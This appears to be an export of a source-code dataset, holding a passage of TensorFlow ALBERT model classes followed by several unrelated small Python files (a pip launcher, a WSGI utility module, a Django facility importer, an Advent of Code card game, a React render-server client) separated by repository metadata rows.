outputs = self.albert(
input_ids=inputs["input_ids"],
attention_mask=inputs["attention_mask"],
token_type_ids=inputs["token_type_ids"],
position_ids=inputs["position_ids"],
head_mask=inputs["head_mask"],
inputs_embeds=inputs["inputs_embeds"],
output_attentions=inputs["output_attentions"],
output_hidden_states=inputs["output_hidden_states"],
return_dict=return_dict,
training=inputs["training"],
)
sequence_output = outputs[0]
sequence_output = self.dropout(inputs=sequence_output, training=inputs["training"])
logits = self.classifier(inputs=sequence_output)
loss = None if inputs["labels"] is None else self.compute_loss(labels=inputs["labels"], logits=logits)
if not inputs["return_dict"]:
output = (logits,) + outputs[2:]
return ((loss,) + output) if loss is not None else output
return TFTokenClassifierOutput(
loss=loss,
logits=logits,
hidden_states=outputs.hidden_states,
attentions=outputs.attentions,
)
# Copied from adj_tf.models.bert.modeling_tf_bert.TFBertForTokenClassification.serving_output
def serving_output(self, output: TFTokenClassifierOutput) -> TFTokenClassifierOutput:
hs = tf.convert_to_tensor(output.hidden_states) if self.config.output_hidden_states else None
attns = tf.convert_to_tensor(output.attentions) if self.config.output_attentions else None
return TFTokenClassifierOutput(logits=output.logits, hidden_states=hs, attentions=attns)
@add_start_docstrings(
"""
Albert Model with a span classification head on top for extractive question-answering tasks like SQuAD (a linear
layer on top of the hidden-states output to compute `span start logits` and `span end logits`).
""",
ALBERT_START_DOCSTRING,
)
class TFAlbertForQuestionAnswering(TFAlbertPreTrainedModel, TFQuestionAnsweringLoss):
# names with a '.' represents the authorized unexpected/missing layers when a TF model is loaded from a PT model
_keys_to_ignore_on_load_unexpected = [r"pooler", r"predictions"]
def __init__(self, config: AlbertConfig, *inputs, **kwargs):
super().__init__(config, *inputs, **kwargs)
self.num_labels = config.num_labels
self.albert = TFAlbertMainLayer(config, add_pooling_layer=False, name="albert")
self.qa_outputs = tf.keras.layers.Dense(
units=config.num_labels, kernel_initializer=get_initializer(config.initializer_range), name="qa_outputs"
)
@add_start_docstrings_to_model_forward(ALBERT_INPUTS_DOCSTRING.format("batch_size, sequence_length"))
@add_code_sample_docstrings(
tokenizer_class=_TOKENIZER_FOR_DOC,
checkpoint="albert-base-v2",
output_type=TFQuestionAnsweringModelOutput,
config_class=_CONFIG_FOR_DOC,
)
def call(
self,
input_ids: Optional[TFModelInputType] = None,
attention_mask: Optional[Union[np.ndarray, tf.Tensor]] = None,
token_type_ids: Optional[Union[np.ndarray, tf.Tensor]] = None,
position_ids: Optional[Union[np.ndarray, tf.Tensor]] = None,
head_mask: Optional[Union[np.ndarray, tf.Tensor]] = None,
inputs_embeds: Optional[Union[np.ndarray, tf.Tensor]] = None,
output_attentions: Optional[bool] = None,
output_hidden_states: Optional[bool] = None,
return_dict: Optional[bool] = None,
start_positions: Optional[Union[np.ndarray, tf.Tensor]] = None,
end_positions: Optional[Union[np.ndarray, tf.Tensor]] = None,
training: Optional[bool] = False,
**kwargs,
) -> Union[TFQuestionAnsweringModelOutput, Tuple[tf.Tensor]]:
r"""
start_positions (:obj:`tf.Tensor` of shape :obj:`(batch_size,)`, `optional`):
Labels for position (index) of the start of the labelled span for computing the token classification loss.
Positions are clamped to the length of the sequence (:obj:`sequence_length`). Position outside of the
sequence are not taken into account for computing the loss.
end_positions (:obj:`tf.Tensor` of shape :obj:`(batch_size,)`, `optional`):
Labels for position (index) of the end of the labelled span for computing the token classification loss.
Positions are clamped to the length of the sequence (:obj:`sequence_length`). Position outside of the
sequence are not taken into account for computing the loss.
"""
inputs = input_processing(
func=self.call,
config=self.config,
input_ids=input_ids,
attention_mask=attention_mask,
token_type_ids=token_type_ids,
position_ids=position_ids,
head_mask=head_mask,
inputs_embeds=inputs_embeds,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
start_positions=start_positions,
end_positions=end_positions,
training=training,
kwargs_call=kwargs,
)
outputs = self.albert(
input_ids=inputs["input_ids"],
attention_mask=inputs["attention_mask"],
token_type_ids=inputs["token_type_ids"],
position_ids=inputs["position_ids"],
head_mask=inputs["head_mask"],
inputs_embeds=inputs["inputs_embeds"],
output_attentions=inputs["output_attentions"],
output_hidden_states=inputs["output_hidden_states"],
return_dict=inputs["return_dict"],
training=inputs["training"],
)
sequence_output = outputs[0]
logits = self.qa_outputs(inputs=sequence_output)
start_logits, end_logits = tf.split(value=logits, num_or_size_splits=2, axis=-1)
start_logits = tf.squeeze(input=start_logits, axis=-1)
end_logits = tf.squeeze(input=end_logits, axis=-1)
loss = None
if inputs["start_positions"] is not None and inputs["end_positions"] is not None:
labels = {"start_position": inputs["start_positions"]}
labels["end_position"] = inputs["end_positions"]
loss = self.compute_loss(labels=labels, logits=(start_logits, end_logits))
if not inputs["return_dict"]:
output = (start_logits, end_logits) + outputs[2:]
return ((loss,) + output) if loss is not None else output
return TFQuestionAnsweringModelOutput(
loss=loss,
start_logits=start_logits,
end_logits=end_logits,
hidden_states=outputs.hidden_states,
attentions=outputs.attentions,
)
# Copied from adj_tf.models.bert.modeling_tf_bert.TFBertForQuestionAnswering.serving_output
def serving_output(self, output: TFQuestionAnsweringModelOutput) -> TFQuestionAnsweringModelOutput:
hs = tf.convert_to_tensor(output.hidden_states) if self.config.output_hidden_states else None
attns = tf.convert_to_tensor(output.attentions) if self.config.output_attentions else None
return TFQuestionAnsweringModelOutput(
start_logits=output.start_logits, end_logits=output.end_logits, hidden_states=hs, attentions=attns
)
@add_start_docstrings(
"""
Albert Model with a multiple choice classification head on top (a linear layer on top of the pooled output and a
softmax) e.g. for RocStories/SWAG tasks.
""",
ALBERT_START_DOCSTRING,
)
class TFAlbertForMultipleChoice(TFAlbertPreTrainedModel, TFMultipleChoiceLoss):
# names with a '.' represents the authorized unexpected/missing layers when a TF model is loaded from a PT model
_keys_to_ignore_on_load_unexpected = [r"pooler", r"predictions"]
_keys_to_ignore_on_load_missing = [r"dropout"]
def __init__(self, config: AlbertConfig, *inputs, **kwargs):
super().__init__(config, *inputs, **kwargs)
self.albert = TFAlbertMainLayer(config, name="albert")
self.dropout = tf.keras.layers.Dropout(rate=config.hidden_dropout_prob)
self.classifier = tf.keras.layers.Dense(
units=1, kernel_initializer=get_initializer(config.initializer_range), name="classifier"
)
@property
def dummy_inputs(self):
"""
Dummy inputs to build the network.
Returns:
tf.Tensor with dummy inputs
"""
return {"input_ids": tf.constant(MULTIPLE_CHOICE_DUMMY_INPUTS)}
@add_start_docstrings_to_model_forward(ALBERT_INPUTS_DOCSTRING.format("batch_size, num_choices, sequence_length"))
@add_code_sample_docstrings(
tokenizer_class=_TOKENIZER_FOR_DOC,
checkpoint="albert-base-v2",
output_type=TFMultipleChoiceModelOutput,
config_class=_CONFIG_FOR_DOC,
)
def call(
self,
input_ids: Optional[TFModelInputType] = None,
attention_mask: Optional[Union[np.ndarray, tf.Tensor]] = None,
token_type_ids: Optional[Union[np.ndarray, tf.Tensor]] = None,
position_ids: Optional[Union[np.ndarray, tf.Tensor]] = None,
head_mask: Optional[Union[np.ndarray, tf.Tensor]] = None,
inputs_embeds: Optional[Union[np.ndarray, tf.Tensor]] = None,
output_attentions: Optional[bool] = None,
output_hidden_states: Optional[bool] = None,
return_dict: Optional[bool] = None,
labels: Optional[Union[np.ndarray, tf.Tensor]] = None,
training: Optional[bool] = False,
**kwargs,
) -> Union[TFMultipleChoiceModelOutput, Tuple[tf.Tensor]]:
r"""
labels (:obj:`tf.Tensor` of shape :obj:`(batch_size,)`, `optional`):
Labels for computing the multiple choice classification loss. Indices should be in ``[0, ...,
num_choices]`` where :obj:`num_choices` is the size of the second dimension of the input tensors. (See
:obj:`input_ids` above)
"""
inputs = input_processing(
func=self.call,
config=self.config,
input_ids=input_ids,
attention_mask=attention_mask,
token_type_ids=token_type_ids,
position_ids=position_ids,
head_mask=head_mask,
inputs_embeds=inputs_embeds,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
labels=labels,
training=training,
kwargs_call=kwargs,
)
if inputs["input_ids"] is not None:
num_choices = shape_list(inputs["input_ids"])[1]
seq_length = shape_list(inputs["input_ids"])[2]
else:
num_choices = shape_list(inputs["inputs_embeds"])[1]
seq_length = shape_list(inputs["inputs_embeds"])[2]
flat_input_ids = tf.reshape(inputs["input_ids"], (-1, seq_length)) if inputs["input_ids"] is not None else None
flat_attention_mask = (
tf.reshape(tensor=inputs["attention_mask"], shape=(-1, seq_length))
if inputs["attention_mask"] is not None
else None
)
flat_token_type_ids = (
tf.reshape(tensor=inputs["token_type_ids"], shape=(-1, seq_length))
if inputs["token_type_ids"] is not None
else None
)
flat_position_ids = (
tf.reshape(tensor=position_ids, shape=(-1, seq_length)) if position_ids is not None else None
)
flat_inputs_embeds = (
tf.reshape(tensor=inputs["inputs_embeds"], shape=(-1, seq_length, shape_list(inputs["inputs_embeds"])[3]))
if inputs["inputs_embeds"] is not None
else None
)
outputs = self.albert(
input_ids=flat_input_ids,
attention_mask=flat_attention_mask,
token_type_ids=flat_token_type_ids,
position_ids=flat_position_ids,
head_mask=inputs["head_mask"],
inputs_embeds=flat_inputs_embeds,
output_attentions=inputs["output_attentions"],
output_hidden_states=inputs["output_hidden_states"],
return_dict=inputs["return_dict"],
training=inputs["training"],
)
pooled_output = outputs[1]
pooled_output = self.dropout(inputs=pooled_output, training=inputs["training"])
logits = self.classifier(inputs=pooled_output)
reshaped_logits = tf.reshape(tensor=logits, shape=(-1, num_choices))
loss = None if inputs["labels"] is None else self.compute_loss(labels=inputs["labels"], logits=reshaped_logits)
if not inputs["return_dict"]:
output = (reshaped_logits,) + outputs[2:]
return ((loss,) + output) if loss is not None else output
return TFMultipleChoiceModelOutput(
loss=loss,
logits=reshaped_logits,
hidden_states=outputs.hidden_states,
attentions=outputs.attentions,
)
@tf.function(
input_signature=[
{
"input_ids": tf.TensorSpec((None, None, None), tf.int32, name="input_ids"),
"attention_mask": tf.TensorSpec((None, None, None), tf.int32, name="attention_mask"),
"token_type_ids": tf.TensorSpec((None, None, None), tf.int32, name="token_type_ids"),
}
]
)
# Copied from adj_tf.models.bert.modeling_tf_bert.TFBertForMultipleChoice.serving
def serving(self, inputs: Dict[str, tf.Tensor]) -> TFMultipleChoiceModelOutput:
output = self.call(input_ids=inputs)
return self.serving_output(output)
# Copied from adj_tf.models.bert.modeling_tf_bert.TFBertForMultipleChoice.serving_output
def serving_output(self, output: TFMultipleChoiceModelOutput) -> TFMultipleChoiceModelOutput:
hs = tf.convert_to_tensor(output.hidden_states) if self.config.output_hidden_states else None
attns = tf.convert_to_tensor(output.attentions) if self.config.output_attentions else None
return TFMultipleChoiceModelOutput(logits=output.logits, hidden_states=hs, attentions=attns)
|
[
"[email protected]"
] | |
d3b8e62fee8dbdb31c0ad6e0e6956cf3d36fa35b
|
1a31fce39e8c83e32a79389132867a048518d3b9
|
/backend/venv/bin/pip
|
5a1e94108c38ab27cca4c3a7946035206bc8d128
|
[] |
no_license
|
ziminyuri/Verbal-Decision-Analysis-SNOD
|
54f3c5dfa57204e69f126799aea8455985233aac
|
f580794c9a902a887d05e97597c7ddb5de36c2d5
|
refs/heads/master
| 2023-03-13T05:12:17.696971 | 2021-02-11T13:17:42 | 2021-02-11T13:17:42 | 297,934,295 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 288 |
#!/Users/zimin/Documents/GitHub/Verbal-Decision-Analysis-SNOD/backend/venv/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from pip._internal.cli.main import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
sys.exit(main())
|
[
"[email protected]"
] | ||
2626379928ce4d207789a77c1bcc5ed5fb915ad1
|
5d9b7e117373d14d3ee720b33848b7e4c0d06e5a
|
/spaghettibin/mainapp/patterns/utils.py
|
8c458ac1e1516af2637ddb0d703209f6b3ca6366
|
[] |
no_license
|
loneloon/spaghettibin
|
36873fc56175b6ae44165ce3ed0f65c84e63f4e3
|
6e4c0e3961cdfb1b22775d4b1290f1671fb79ca9
|
refs/heads/main
| 2023-03-01T01:54:01.075530 | 2021-02-16T05:48:58 | 2021-02-16T05:48:58 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 4,412 |
py
|
import re
signin_link = '/signin/'
def parse_queries(data: str):
result = {}
if data:
if '&' in data:
params = data.split('&')
else:
params = data.split('\r\n')
while '' in params:
params.remove('')
for item in params:
key, value = item.split('=')
result[key] = value
return result
def parse_input_data(data: bytes) -> str:
if data:
data_str = data.decode(encoding="utf-8")
return data_str
else:
return ''
def get_input_data(env) -> bytes:
content_length_data = env.get('CONTENT_LENGTH')
content_length = int(content_length_data) if content_length_data else 0
data = env['wsgi.input'].read(content_length) if content_length > 0 else b''
return data
def add_url(cls, path, view):
try:
cls.routes[path] = view
except Exception as e:
print(e)
def not_found_404_view(request, site=None, db=None):
return '404 BAD', [b'404 Page Not Found']
def bad_request(request=None, site=None, db=None):
return '404 BAD', [b'404 Bad Request, Buddy']
def redirect_302(url):
return '302', url
def is_logged_in(request, session_model, user_model, db):
session = db.get_object(model=session_model, cookie=request['cookie'])
if session:
user = db.get_object(model=user_model, id=session.user_fk)
if user:
return {'name': user.name, 'super': user.is_superuser}
else:
return None
def make_form_from_model(model, exclude=None):
items = []
try:
for key in model.__slots__:
included = True
if exclude is not None:
for tag in exclude:
if '_' in tag:
if tag in key:
included = False
else:
if tag == key:
included = False
if included:
items.append(key)
except Exception as e:
print(e)
return items
def harvest_db_obj(db_response):
result = None
try:
if db_response is not None:
if isinstance(db_response, list or tuple):
result = list(dict((k, v)
for k, v in obj.__dict__.items()
if not k.startswith('_'))
for obj in db_response)
else:
result = dict((k, v)
for k, v in db_response.__dict__.items()
if not k.startswith('_'))
else:
result = None
except Exception as e:
print(e)
finally:
return result
def slice_path(source):
try:
source = source.split('/')
while '' in source:
source.remove('')
return source
except Exception as e:
print(e)
return []
def re_match_view(path, routes, alt):
view = alt
for key, value in routes.items():
if re.fullmatch(key, path):
view = value
return view
def compile_request(environ):
request = {
'path': environ['PATH_INFO'],
'method': environ['REQUEST_METHOD'],
'cookie': environ['HTTP_COOKIE'].split('=')[-1],
'next': ""
}
if request['method'] == 'GET':
request['queries'] = parse_queries(environ['QUERY_STRING'])
else:
request['queries'] = parse_queries(parse_input_data(get_input_data(environ)))
if 'next' in request['queries'].keys():
request['next'] = request['queries'].pop('next')
return request
def login_required(view):
def wrapper(*args, **kwargs):
if 'request' not in kwargs.keys():
request = args[1]
else:
request = kwargs['request']
if not request['user']:
request['next'] = signin_link
return view(*args, **kwargs)
return wrapper
def admin_required(view):
def wrapper(*args, **kwargs):
if 'request' not in kwargs.keys():
request = args[1]
else:
request = kwargs['request']
if not request['user']:
request['next'] = signin_link
else:
if not request['user']['super']:
return redirect_302('/')
return view(*args, **kwargs)
return
|
[
"[email protected]"
] | |
b31ccd4b4007cb4ee5b887a84613fa6b8a303ae4
|
0211132a35d1fb990a061ab28eec3b00363c7c42
|
/setup.py
|
20144d27c7e4b35114002a3455cf25664c086e8e
|
[
"BSD-3-Clause"
] |
permissive
|
victordeleau/codae
|
bb312fa006683e496c8dc41da84fd22202db57a7
|
d5b8351334df64b30b3f6929c934a936b66ed963
|
refs/heads/master
| 2022-11-27T21:05:56.773564 | 2020-07-25T15:24:31 | 2020-07-25T15:24:31 | 178,262,644 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 113 |
py
|
from setuptools import setup, find_packages
setup(
name='codae',
version='1.0',
packages=["codae"]
)
|
[
"[email protected]"
] | |
39d331e59d88c829c46113d50cfb446786f0fdfa
|
0d78474be6255f053d69d081d69caed76e46fe48
|
/aol/facilities/models.py
|
faab6649b33bb74829f6a6998b92ca45b8eba82b
|
[] |
no_license
|
conwayb/aol
|
5eff86ce1addaeb82d6437d1f548409e2b962e6e
|
d29538a502d028574e142baca508db5bfc4430ca
|
refs/heads/master
| 2020-04-05T21:32:20.035371 | 2016-11-04T23:59:04 | 2016-11-04T23:59:04 | 12,762,715 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,885 |
py
|
import requests
from django.contrib.gis.db import models
from django.contrib.gis.gdal import CoordTransform, SpatialReference
from django.contrib.gis.geos import Point
from django.db import transaction
class FacilityManager(models.Manager):
def to_kml(self, bbox):
return Facility.objects.all().extra(
select={'kml': 'st_askml(the_geom)'},
where=[
"the_geom && st_setsrid(st_makebox2d(st_point(%s, %s), st_point(%s, %s)), 3644)",
],
params=bbox
)
def reimport(self):
"""
Connects to the Oregon facility JSON endpoint and reimports all the
facilities
"""
response = requests.get("https://data.oregon.gov/resource/spxe-q5vj.json")
js = response.json()
# the data source uses WGS84 coords, so we have to transform them
gcoord = SpatialReference(4326)
mycoord = SpatialReference(3644)
trans = CoordTransform(gcoord, mycoord)
with transaction.atomic():
# wipe out the existing facilties
Facility.objects.all().delete()
for row in js:
try:
p = Point(float(row['location']['longitude']), float(row['location']['latitude']), srid=4326)
except KeyError:
continue
p.transform(trans)
f = Facility(
name=row['boating_facility_name'],
managed_by=row.get('managed_by', ''),
telephone=row.get('telephone', {}).get('phone_number', ''),
ramp_type=row.get('ramp_type_lanes', ''),
trailer_parking=row.get('trailer_parking', ''),
moorage=row.get('moorage', ''),
launch_fee=row.get('launch_fee', ''),
restroom=row.get('restroom', ''),
supplies=row.get('supplies', ''),
gas_on_water=row.get('gas_on_the_water', ''),
diesel_on_water=row.get('diesel_on_the_water', ''),
waterbody=row.get('waterbody', ''),
fish_cleaning=row.get('fish_cleaning_station', ''),
pumpout=row.get('pumpout', ''),
dump_station=row.get('dump_station', ''),
the_geom=p,
icon_url=row.get('boater_services', ''),
)
f.save()
class Facility(models.Model):
facility_id = models.AutoField(primary_key=True)
name = models.CharField(max_length=254, db_column="facilityna")
waterbody = models.CharField(max_length=254)
islake = models.IntegerField()
type = models.CharField(max_length=254)
telephone = models.CharField(max_length=254)
ramp_type = models.CharField(max_length=254, db_column="ramp_type_")
moorage = models.CharField(max_length=254)
trailer_parking = models.CharField(max_length=254, db_column="trailer_pa")
transient = models.CharField(max_length=254)
launch_fee = models.CharField(max_length=254)
restroom = models.CharField(max_length=254)
supplies = models.CharField(max_length=254)
gas_on_water = models.CharField(max_length=254, db_column="gas_on_the")
diesel_on_water = models.CharField(max_length=254, db_column="diesel_on")
fish_cleaning = models.CharField(max_length=254, db_column="fish_clean")
pumpout = models.CharField(max_length=254)
dump_station = models.CharField(max_length=254, db_column="dump_stati")
managed_by = models.CharField(max_length=254)
latitude = models.FloatField()
longitude = models.FloatField()
boater_ser = models.CharField(max_length=254)
icon_url = models.CharField(max_length=254)
the_geom = models.PointField(srid=3644)
objects = FacilityManager()
class Meta:
db_table = "facility"
|
[
"[email protected]"
] | |
1979fca7aa9b1817738c9706a16ba34f22f64692
|
4908b1d34d69c1cb652f25049552562574e1075f
|
/2020/Day-22/Crab_Combat/example.py
|
25da40021ae28995dac1a997eebd358fed3a5fe5
|
[
"MIT"
] |
permissive
|
sreekesari-vangeepuram/adventofcode
|
3d4ad98a25a30640182d928538b421e00ad8259d
|
645531be0208affe042ac0328105b9ef3cfc9dbf
|
refs/heads/main
| 2023-07-26T13:36:03.036721 | 2021-08-11T08:27:25 | 2021-08-11T08:27:25 | 317,850,039 | 1 | 0 |
MIT
| 2021-08-11T08:27:26 | 2020-12-02T12:08:13 |
Go
|
UTF-8
|
Python
| false | false | 973 |
py
|
#!/usr/bin/env python
from typing import List, Tuple
def play_space_cards(p1: List[int], p2: List[int]) -> Tuple[str, List[int]]:
b1, b2 = 0, 0 # buffer spaces for both players to space their cards
while len(p1) !=0 and len(p2)!= 0:
b1, b2 = p1.pop(0), p2.pop(0)
if b1 > b2:
p1.extend([b1, b2])
else:
p2.extend([b2, b1])
if len(p1) != 0:
return "Player_1", p1
return "Player_2", p2
def count_score(winner_deck: List[int]) -> int:
accumulator = 0
for card, multiplier in zip(winner_deck, list(reversed(range(1, len(winner_deck)+1)))):
accumulator += card * multiplier
return accumulator
decks = open("sample.txt").read().strip().split("\n\n")
player_1 = list(map(int, decks[0].split("\n")[1:]))
player_2 = list(map(int, decks[1].split("\n")[1:]))
winner, winner_deck = play_space_cards(player_1, player_2)
print(f"Combat: {winner} won with score {count_score(winner_deck)}!")
|
[
"[email protected]"
] | |
731ddf38caa2c4256f0d8a41ee367b3da942d9e6
|
bd1793b867d511e24e46b4c51acc5b4371a875c1
|
/TestModel/migrations/0001_initial.py
|
b425cf8231fd2c4e3572c56cfde1b75b2d634056
|
[] |
no_license
|
Animoji/vue-python
|
5f3a8ebd134e16662869cc814393b922a321a3cd
|
1bf1f87dcf126be8e75bb94b6fe3289b84f9a6e9
|
refs/heads/master
| 2020-03-19T23:56:34.501882 | 2018-06-12T13:42:12 | 2018-06-12T13:42:12 | 137,025,779 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 483 |
py
|
# Generated by Django 2.1a1 on 2018-06-07 13:51
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Test',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=20)),
],
),
]
|
[
"[email protected]"
] | |
2cbdf4473d404c56a2846b7ae5b0d3379a099e86
|
ce702bf0745ec4a44087d07829e9e68a0e81b748
|
/Numpy,Panades,Matplotlib/4.1.py
|
315a83e3ff241be8cab34142025005ebb1cb0022
|
[] |
no_license
|
monster-yjz/learning_1
|
3bab88132c5029d09a0552d7c7e4dd7f4be6bf80
|
e69e9bd016b24194f6e67a06540724d2c6933f07
|
refs/heads/master
| 2022-07-31T13:27:11.498120 | 2020-05-10T14:04:40 | 2020-05-10T14:04:40 | 262,206,558 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 136 |
py
|
import numpy as np
data1 = [[1, 2, 3, 4], [1, 5, 8, 4]]
arr1 = np.array(data1)
data2 = np.eye(4, 5)
data3 = np.random.randn(4, 3, 4)
|
[
"[email protected]"
] | |
76da3f488792fec1b25c04baa7b60b38dd552ef4
|
f2301f8c438427bbbb573ce91cb7edc9006d154f
|
/react/render_server.py
|
a7b190709da4e998a59f92967e3b5c8a81086d67
|
[
"MIT"
] |
permissive
|
vijaykunapareddy/MERNAPP
|
5d520cc0d8391f0c63f499580d2fa94942640fc3
|
27d029e462843061dcfa06c86a8fc04bba96f5b3
|
refs/heads/master
| 2021-01-20T08:01:18.325189 | 2017-05-02T23:44:34 | 2017-05-02T23:44:34 | 90,082,700 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,727 |
py
|
import json
import hashlib
import requests
from optional_django.serializers import JSONEncoder
from .exceptions import ReactRenderingError
from . import conf
from .exceptions import RenderServerError
class RenderedComponent(object):
def __init__(self, markup, props):
self.markup = markup
self.props = props
def __str__(self):
return self.markup
def __unicode__(self):
return unicode(self.markup)
class RenderServer(object):
def render(self, path, props=None, to_static_markup=False, request_headers=None, timeout=None):
url = conf.settings.RENDER_URL
if props is not None:
serialized_props = json.dumps(props, cls=JSONEncoder)
else:
serialized_props = None
if not conf.settings.RENDER:
return RenderedComponent('', serialized_props)
options = {
'path': path,
'serializedProps': serialized_props,
'toStaticMarkup': to_static_markup
}
serialized_options = json.dumps(options)
options_hash = hashlib.sha1(serialized_options.encode('utf-8')).hexdigest()
all_request_headers = {'content-type': 'application/json'}
# Add additional requests headers if the requet_headers dictionary is specified
if request_headers is not None:
all_request_headers.update(request_headers)
# Add a send/receive timeout with the request if not specified
if not isinstance(timeout, (tuple, int, float)):
timeout = (5, 5)
try:
res = requests.post(
url,
data=serialized_options,
headers=all_request_headers,
params={'hash': options_hash},
timeout=timeout
)
except requests.ConnectionError:
raise RenderServerError('Could not connect to render server at {}'.format(url))
if res.status_code != 200:
raise RenderServerError(
'Unexpected response from render server at {} - {}: {}'.format(url, res.status_code, res.text)
)
obj = res.json()
markup = obj.get('markup', None)
err = obj.get('error', None)
if err:
if 'message' in err and 'stack' in err:
raise ReactRenderingError(
'Message: {}\n\nStack trace: {}'.format(err['message'], err['stack'])
)
raise ReactRenderingError(err)
if markup is None:
raise ReactRenderingError('Render server failed to return markup. Returned: {}'.format(obj))
return RenderedComponent(markup, serialized_props)
render_server = RenderServer()
|
[
"[email protected]"
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.